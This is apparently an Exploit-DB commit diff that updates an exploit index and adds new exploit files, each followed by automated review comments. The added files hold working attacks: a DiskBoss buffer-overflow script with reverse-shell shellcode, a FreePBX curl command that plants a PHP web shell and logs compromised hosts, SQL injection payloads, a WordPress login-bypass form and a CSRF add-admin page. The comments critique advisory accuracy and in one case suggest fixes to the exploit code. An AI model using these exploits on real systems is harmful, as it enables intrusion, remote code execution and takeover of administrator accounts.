DB: 2017-01-11
6 new exploits DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH) ClaSS 0.8.60 - (export.php ftype) Local File Inclusion ClaSS 0.8.60 - 'export.php' Local File Inclusion Miniweb 2.0 - SQL Injection (Authentication Bypass) Miniweb 2.0 - Authentication Bypass eDNews 2.0 - (lg) Local File Inclusion eDContainer 2.22 - (lg) Local File Inclusion eDNews 2.0 - Local File Inclusion eDContainer 2.22 - Local File Inclusion Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection Ultimate PHP Board 2.2.1 - Privilege Escalation Sepcity Shopping Mall - SQL Injection Sepcity Lawyer Portal - SQL Injection Sepcity Classified - 'classdis.asp ID' SQL Injection FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection Flexphplink 0.0.x - (Authentication Bypass) SQL Injection eDNews 2.0 - (eDNews_view.php newsid) SQL Injection Sepcity Classified - 'ID' Parameter SQL Injection FlexPHPDirectory 0.0.1 - Authentication Bypass Flexphpsite 0.0.1 - Authentication Bypass Flexphplink 0.0.x - Authentication Bypass eDNews 2.0 - SQL Injection PHPAlumni - 'Acomment.php id' SQL Injection PHPAlumni - SQL Injection Flexphpic 0.0.x - (Authentication Bypass) SQL Injection Flexphpic 0.0.x - Authentication Bypass Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection Mole Group Vacation Estate Listing Script - Blind SQL Injection Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass) Friends in War Make or Break 1.3 - Authentication Bypass My Php Dating 2.0 - 'path' Parameter SQL Injection My Php Dating 2.0 - 'id' Parameter SQL Injection My PHP Dating 2.0 - 'path' Parameter SQL Injection My PHP Dating 2.0 - 'id' Parameter SQL Injection Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection Starting Page 1.3 - SQL Injection Freepbx < 2.11.1.5 - Remote Code Execution 
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
parent
574c0f2df8
commit
1b13c8a790
7 changed files with 247 additions and 18 deletions
42
files.csv
42
files.csv
|
@ -15204,6 +15204,7 @@ id,file,description,date,author,platform,type,port
|
|||
40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
|
||||
40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0
|
||||
40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
|
||||
41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -20356,9 +20357,9 @@ id,file,description,date,author,platform,type,port
|
|||
7574,platforms/php/webapps/7574.txt,"Joomla! Component mDigg 2.2.8 - 'category' Parameter SQL Injection",2008-12-24,boom3rang,php,webapps,0
|
||||
7575,platforms/php/webapps/7575.pl,"Joomla! Component 5starhotels - SQL Injection",2008-12-24,EcHoLL,php,webapps,0
|
||||
7576,platforms/php/webapps/7576.pl,"PHP-Fusion 7.0.2 - Blind SQL Injection",2008-12-24,StAkeR,php,webapps,0
|
||||
7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - (export.php ftype) Local File Inclusion",2008-12-24,fuzion,php,webapps,0
|
||||
7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - 'export.php' Local File Inclusion",2008-12-24,fuzion,php,webapps,0
|
||||
7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - 'lang' Local File Inclusion",2008-12-24,fuzion,php,webapps,0
|
||||
7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - SQL Injection (Authentication Bypass)",2008-12-28,bizzit,php,webapps,0
|
||||
7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - Authentication Bypass",2008-12-28,bizzit,php,webapps,0
|
||||
7587,platforms/php/webapps/7587.txt,"Joomla! Component PAX Gallery 0.1 - Blind SQL Injection",2008-12-28,XaDoS,php,webapps,0
|
||||
7593,platforms/php/webapps/7593.pl,"DeluxeBB 1.2 - Blind SQL Injection",2008-12-28,StAkeR,php,webapps,0
|
||||
7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Authentication Bypass",2008-12-28,k3yv4n,php,webapps,0
|
||||
|
@ -20369,26 +20370,26 @@ id,file,description,date,author,platform,type,port
|
|||
7600,platforms/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload",2008-12-28,Osirys,php,webapps,0
|
||||
7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0
|
||||
7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Authentication Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0
|
||||
7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
|
||||
7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
|
||||
7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
|
||||
7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
|
||||
7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password",2008-12-29,cOndemned,php,webapps,0
|
||||
7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 - Authentication Bypass Change User Password",2008-12-29,R31P0l,php,webapps,0
|
||||
7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation",2008-12-29,StAkeR,php,webapps,0
|
||||
7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
|
||||
7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
|
||||
7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - Privilege Escalation",2008-12-29,StAkeR,php,webapps,0
|
||||
7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
|
||||
7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
|
||||
7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection",2008-12-29,s4avrd0w,php,webapps,0
|
||||
7612,platforms/php/webapps/7612.txt,"Joomla! Component com_na_content 1.0 - Blind SQL Injection",2008-12-29,"Mehmet Ince",php,webapps,0
|
||||
7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'classdis.asp ID' SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0
|
||||
7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
|
||||
7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
|
||||
7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
|
||||
7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - (eDNews_view.php newsid) SQL Injection",2008-12-29,"Virangar Security",php,webapps,0
|
||||
7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'ID' Parameter SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0
|
||||
7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0
|
||||
7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0
|
||||
7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - Authentication Bypass",2008-12-29,x0r,php,webapps,0
|
||||
7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - SQL Injection",2008-12-29,"Virangar Security",php,webapps,0
|
||||
7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary File Upload",2008-12-29,siurek22,php,webapps,0
|
||||
7621,platforms/php/webapps/7621.txt,"PHPAlumni - 'Acomment.php id' SQL Injection",2008-12-29,Mr.SQL,php,webapps,0
|
||||
7621,platforms/php/webapps/7621.txt,"PHPAlumni - SQL Injection",2008-12-29,Mr.SQL,php,webapps,0
|
||||
7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0
|
||||
7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - (Authentication Bypass) SQL Injection",2008-12-30,S.W.A.T.,php,webapps,0
|
||||
7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - Authentication Bypass",2008-12-30,S.W.A.T.,php,webapps,0
|
||||
7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,php,webapps,0
|
||||
7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0
|
||||
7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - Blind SQL Injection",2008-12-30,x0r,php,webapps,0
|
||||
7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0
|
||||
7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0
|
||||
7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0
|
||||
|
@ -26240,7 +26241,7 @@ id,file,description,date,author,platform,type,port
|
|||
22730,platforms/asp/webapps/22730.txt,"Mailtraq 2.2 - Browse.asp Cross-Site Scripting",2003-06-04,"Ziv Kamir",asp,webapps,0
|
||||
22731,platforms/asp/webapps/22731.txt,"Mailtraq 2.2 - Webmail Utility Full Path Disclosure",2003-06-04,"Ziv Kamir",asp,webapps,0
|
||||
22735,platforms/php/webapps/22735.txt,"iDev Rentals 1.0 - Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,php,webapps,0
|
||||
22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass)",2012-11-15,d3b4g,php,webapps,0
|
||||
22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - Authentication Bypass",2012-11-15,d3b4g,php,webapps,0
|
||||
22741,platforms/php/webapps/22741.txt,"BabyGekko 1.2.2e - Multiple Vulnerabilities",2012-11-15,"High-Tech Bridge SA",php,webapps,0
|
||||
22742,platforms/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,cr4wl3r,php,webapps,0
|
||||
22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - Admin.cgi Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0
|
||||
|
@ -36941,5 +36942,10 @@ id,file,description,date,author,platform,type,port
|
|||
40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
|
||||
40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0
|
||||
40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0
|
||||
40999,platforms/php/webapps/40999.txt,"My Php Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
|
||||
41001,platforms/php/webapps/41001.txt,"My Php Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
|
||||
40999,platforms/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
|
||||
41001,platforms/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
|
||||
41002,platforms/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection",2017-01-09,v3n0m,php,webapps,0
|
||||
41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - SQL Injection",2017-01-10,JaMbA,php,webapps,0
|
||||
41005,platforms/php/webapps/41005.txt,"Freepbx < 2.11.1.5 - Remote Code Execution",2016-12-23,inj3ctor3,php,webapps,0
|
||||
41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0
|
||||
41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
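Review bot: The new 41005 row in the last hunk titles the entry `Freepbx < 2.11.1.5 - Remote Code Execution`, but the advisory it indexes (platforms/php/webapps/41005.txt in this same commit) gives the affected range as `before 2.9.0.9, 2.10.x, and 2.11 before 2.11.1.5`, so the index implies that every 2.9 and 2.10 build is unfixed when the advisory says 2.9.0.9+ already is. A title that states the range the advisory gives, or that carries the CVE id the advisory cites, would keep the index from over-claiming. The other hunks only normalize existing titles and add no new facts.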
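--- a/platforms/php/webapps/41002.txt
+++ b/platforms/php/webapps/41002.txt
@@ -0,0 +1,42 @@
+# Exploit : Make or Break 1.7 (imgid) SQL Injection Vulnerability
+# Author : v3n0m
+# Contact : v3n0m[at]outlook[dot]com
+# Date : January, 09-2017 GMT +7:00 Jakarta, Indonesia
+# Software : Make or Break
+# Version : 1.7 Lower versions may also be affected
+# License : Free
+# Download : http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
+# Credits : YOGYACARDERLINK, Dhea Fathin Karima & YOU !!
+
+1. Description
+
+An attacker can exploit this vulnerability to read from the database.
+The parameter 'imgid' is vulnerable.
+
+
+2. Proof of Concept
+
+http://domain.tld/[path]/index.php?imgid=-9999+union+all+select+null,null,null,null,version(),null--
+
+# Exploitation via SQLMap
+
+Parameter: imgid (GET)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: imgid=1 AND 4688=4688
+Vector: AND [INFERENCE]
+
+Type: AND/OR time-based blind
+Title: MySQL >= 5.0.12 OR time-based blind
+Payload: imgid=1 OR SLEEP(2)
+Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
+
+Type: UNION query
+Title: Generic UNION query (NULL) - 11 columns
+Payload: imgid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176786271,0x746264586d76465246657a5778446f756c6d696859494e7247735476506447726470676f4e544c59,0x71706b7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WQyQ
+Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]
+
+
+3. Security Risk
+
+The security risk of the remote sql-injection web vulnerability in the Make or Break CMS is estimated as high.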
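Review bot: The manual PoC and the SQLMap output in section 2 disagree on the query shape — the index.php URL uses a six-column `union all select`, while the SQLMap block reports `Generic UNION query (NULL) - 11 columns` — so at least one of them was taken from a different page or build, and the record should say which endpoint each result applies to. `# Version : 1.7 Lower versions may also be affected` asserts a range that was not tested; state the version actually tested and mark anything else as unverified. Section 3 gives a "high" rating with no reasoning, and the record has no remediation (prepared statements or an integer cast on `imgid`) and no vendor-notification date.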
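--- a/platforms/php/webapps/41004.txt
+++ b/platforms/php/webapps/41004.txt
@@ -0,0 +1,22 @@
+# Vulnerability: Starting Page- SQL Injection
+
+# Date: 10.01.2017
+
+# Vendor Homepage: http://software.friendsinwar.com/
+
+# Tested on: win10
+
+# Author: JaMbA
+
+# Script link: http://software.friendsinwar.com/news.php?readmore=31
+
+#########################
+
+
+# SQL Injection/Exploit :
+
+# Vulnerable Parametre : linkid
+
+# http://localhost/[PATH]/outgoing.php?linkid=[SQL]
+
+Tunisia 4 ever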
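Review bot: The record names a parameter and a URL template but gives no evidence of injection — no error text, differing response or extracted value — so nothing in it lets a reader confirm the finding; a sentence stating what observable behaviour was seen is the minimum. The title `# Vulnerability: Starting Page- SQL Injection` omits the version, although files.csv indexes this entry as 1.3; the version belongs in the record itself. `# Tested on: win10` describes the author's client rather than the server stack the script ran on, and `Parametre` is a typo for `Parameter`. No vendor contact or fix information is recorded.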
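--- a/platforms/php/webapps/41005.txt
+++ b/platforms/php/webapps/41005.txt
@@ -0,0 +1,37 @@
+Exploit Title: Freepbx coockie recordings injection
+Google Dork: Ask Santa
+Date: 23/12/2016
+Exploit Author: inj3ctor3
+Vendor Homepage: https://www.freepbx.org/
+Software Link: ISO LINKS IN SITE https://www.freepbx.org/
+Version: ALL && unpatched/ (Trixbox/freepbx/elastix/pbxinflash/)
+Tested on: Centos 6
+CVE : CVE-2014-7235
+
+1. Description
+
+a critical Zero-Day Remote Code Execution and Privilege Escalation
+exploit within the legacy “FreePBX ARI Framework module/Asterisk
+Recording Interface (ARI)”.
+htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x,
+and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth coockie,
+related to the PHP unserialize function
+
+<?php
+.....
+...
+line 56 $buf = unserialize(stripslashes($_COOKIE['ari_auth']));
+line 57 list($data,$chksum) = $buf;
+....
+?>
+
+A successful attack may compromise the whole system aiding the hacker to gain
+
+further privileges via taking advantage of famous nmap shell
+
+without further or do this is a poc code
+
+curl -ks -m20 http://127.0.0.1/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "<?php if(\$_COOKIE[\"lang\"]) {system(\$_COOKIE[\"lang\"]);}die();?>");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null
+
+if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi
+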
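Review bot: `a critical Zero-Day Remote Code Execution` in section 1 contradicts the record's own `CVE : CVE-2014-7235` and its affected range `before 2.9.0.9, 2.10.x, and 2.11 before 2.11.1.5`, which is fixed-version information; the zero-day wording should go, and `Version: ALL && unpatched/ (Trixbox/freepbx/elastix/pbxinflash/)` should be replaced by that range. The PoC's cookie string bundles the serialized `ari_auth` value that the description ties to `unserialize` in login.php with an `ari_lang` value the description never mentions and three hard-coded session ids from the author's environment, and it appends results to `xploited_new.txt`, so the record documents a scan script rather than the vulnerability; it should state which part is the CVE-2014-7235 trigger and drop the environment residue. `coockie` is a typo for `cookie` in the title and the description, and no remediation (upgrade to a fixed release or remove the legacy ARI module) is given.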
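--- a/platforms/php/webapps/41006.txt
+++ b/platforms/php/webapps/41006.txt
@@ -0,0 +1,24 @@
+# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
+# Date: 10-01-2017
+# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: web
+
+1. Description
+
+You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
+
+http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html
+
+2. Proof of Concept
+
+<form method="post" action="http://wp/wp-admin/admin-ajax.php">
+Username: <input type="text" name="username" value="administrator">
+<input type="hidden" name="email" value="sth">
+<input type="hidden" name="action" value="loginGuestFacebook">
+<input type="submit" value="Login">
+</form>
+
+Then you can go to admin panel.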
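Review bot: The description — `You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().` — describes an authentication bypass, not the "Privilege Escalation" in the title and the files.csv entry; either rename the record or explain what escalation follows the login. The PoC form posts to `http://wp/wp-admin/admin-ajax.php`, an environment-specific host, where the other records in this commit use a `[PATH]` placeholder. No fixed plugin version or vendor-notification date is recorded, which is the information a site owner needs from this entry.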
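--- a/platforms/php/webapps/41007.html
+++ b/platforms/php/webapps/41007.html
@@ -0,0 +1,32 @@
+# # # # #
+# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)
+# Google Dork: FMyLife Clone Script
+# Date:10.01.2017
+# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
+# Tested on: http://www.tellaboutit.com/admin/
+# Script Name: FMyLife Clone Script (Pro Edition)
+# Script Version: 1.1
+# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+#Exploit :
+<html>
+<body>
+<h2>Add an Administrator</h2>
+<form action="http://localhost/[PATH]/admin/" method="post">
+<div id="add-admin-form">
+<input type="hidden" name="action" value="add-admin" />
+<label for="username">Username:</label>
+<input type="text" id="username" name="admin-username" value="" />
+<div class="spacer"></div>
+<label for="password">Password:</label>
+<input type="password" id="password" name="admin-password" value="" />
+<div class="spacer"></div>
+<input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" />
+</div>
+</form>
+</body>
+</html>
+# # # # #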
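Review bot: `# Tested on: http://www.tellaboutit.com/admin/` records a live third-party installation as the test target; an advisory should not name someone else's production host, and the line should use the same placeholder the PoC itself uses (`http://localhost/[PATH]/admin/`). The body never names the vulnerability class — `Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)` is a feature list — while files.csv indexes the entry as Cross-Site Request Forgery; one sentence stating that the admin `add-admin` action is accepted without an anti-CSRF token (the PoC form carries none) plus a remediation line (per-request token, SameSite cookies) would make the record self-describing. `<input type="image" src="add-administrator.png" ...>` references an image that does not ship with the PoC.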
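--- a/platforms/windows/remote/41003.py
+++ b/platforms/windows/remote/41003.py
@@ -0,0 +1,66 @@
+#!/usr/bin/python
+
+# Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow
+# Date: 10-01-2017
+# Exploit Author: Wyndell Bibera
+# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe
+# Version: 7.5.12
+# Tested on: Windows XP Professional SP3
+
+import socket
+
+ip = "192.168.86.150"
+port = 80
+
+egg = "ezggezgg"
+nopslide = "\x90" * 8
+
+# Bad characters: \x00\x09\x0a\x0d\x20
+# Reverse Shell @ Port 443 - Change shellcode section accordingly
+shellcode = ("\xb8\x45\x49\xe1\x98\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
+"\x52\x31\x47\x12\x03\x47\x12\x83\x82\x4d\x03\x6d\xf0\xa6\x41"
+"\x8e\x08\x37\x26\x06\xed\x06\x66\x7c\x66\x38\x56\xf6\x2a\xb5"
+"\x1d\x5a\xde\x4e\x53\x73\xd1\xe7\xde\xa5\xdc\xf8\x73\x95\x7f"
+"\x7b\x8e\xca\x5f\x42\x41\x1f\x9e\x83\xbc\xd2\xf2\x5c\xca\x41"
+"\xe2\xe9\x86\x59\x89\xa2\x07\xda\x6e\x72\x29\xcb\x21\x08\x70"
+"\xcb\xc0\xdd\x08\x42\xda\x02\x34\x1c\x51\xf0\xc2\x9f\xb3\xc8"
+"\x2b\x33\xfa\xe4\xd9\x4d\x3b\xc2\x01\x38\x35\x30\xbf\x3b\x82"
+"\x4a\x1b\xc9\x10\xec\xe8\x69\xfc\x0c\x3c\xef\x77\x02\x89\x7b"
+"\xdf\x07\x0c\xaf\x54\x33\x85\x4e\xba\xb5\xdd\x74\x1e\x9d\x86"
+"\x15\x07\x7b\x68\x29\x57\x24\xd5\x8f\x1c\xc9\x02\xa2\x7f\x86"
+"\xe7\x8f\x7f\x56\x60\x87\x0c\x64\x2f\x33\x9a\xc4\xb8\x9d\x5d"
+"\x2a\x93\x5a\xf1\xd5\x1c\x9b\xd8\x11\x48\xcb\x72\xb3\xf1\x80"
+"\x82\x3c\x24\x06\xd2\x92\x97\xe7\x82\x52\x48\x80\xc8\x5c\xb7"
+"\xb0\xf3\xb6\xd0\x5b\x0e\x51\x1f\x33\x46\x2d\xf7\x46\x66\x2c"
+"\xb3\xce\x80\x44\xd3\x86\x1b\xf1\x4a\x83\xd7\x60\x92\x19\x92"
+"\xa3\x18\xae\x63\x6d\xe9\xdb\x77\x1a\x19\x96\x25\x8d\x26\x0c"
+"\x41\x51\xb4\xcb\x91\x1c\xa5\x43\xc6\x49\x1b\x9a\x82\x67\x02"
+"\x34\xb0\x75\xd2\x7f\x70\xa2\x27\x81\x79\x27\x13\xa5\x69\xf1"
+"\x9c\xe1\xdd\xad\xca\xbf\x8b\x0b\xa5\x71\x65\xc2\x1a\xd8\xe1"
+"\x93\x50\xdb\x77\x9c\xbc\xad\x97\x2d\x69\xe8\xa8\x82\xfd\xfc"
+"\xd1\xfe\x9d\x03\x08\xbb\xae\x49\x10\xea\x26\x14\xc1\xae\x2a"
+"\xa7\x3c\xec\x52\x24\xb4\x8d\xa0\x34\xbd\x88\xed\xf2\x2e\xe1"
+"\x7e\x97\x50\x56\x7e\xb2")
+scpad = "\x90" * (2480 - len(shellcode) - len(nopslide))
+shortjmp = "\xeb\x0f\x90\x90"
+
+# Search for string 'ezgg' twice
+egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+"\xef\xb8\x65\x7a\x67\x67\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+
+extra = "\x90" * 9
+pad = "\x90" * (5000 - len(extra) - 2496 - len(egghunter))
+
+# POP POP RET Instruction
+seh = "\x6b\xa6\x02\x10"
+
+buffer = (
+"POST " + egg + nopslide + shellcode + scpad + shortjmp + seh + extra + egghunter + pad + " HTTP/1.1\r\n"
+"Host: :192.168.86.150\r\n"
+"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
+"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/* ;q=0.8\r\n\r\n")
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((ip, port))
+s.send(buffer)
+s.close()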
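Review bot: The target address is hard-coded twice — in `ip` and again inside the request as `"Host: :192.168.86.150\r\n"`, which also carries a stray colon — so the two can diverge when one is edited; build the header from the variable, `"Host: " + ip + "\r\n"`. The constants 2480, 2496 and 5000 in `scpad` and `pad` are unexplained; a comment stating that `egg + nopslide + shellcode + scpad` is held at 2488 bytes, that `shortjmp + seh` brings the offset to 2496, and that 5000 is the total request size would let a reader verify the arithmetic instead of re-deriving it. The script is Python 2 only (`s.send(buffer)` passes a str), while `#!/usr/bin/python` does not say so; `#!/usr/bin/env python2` or a note in the header would avoid a TypeError under Python 3.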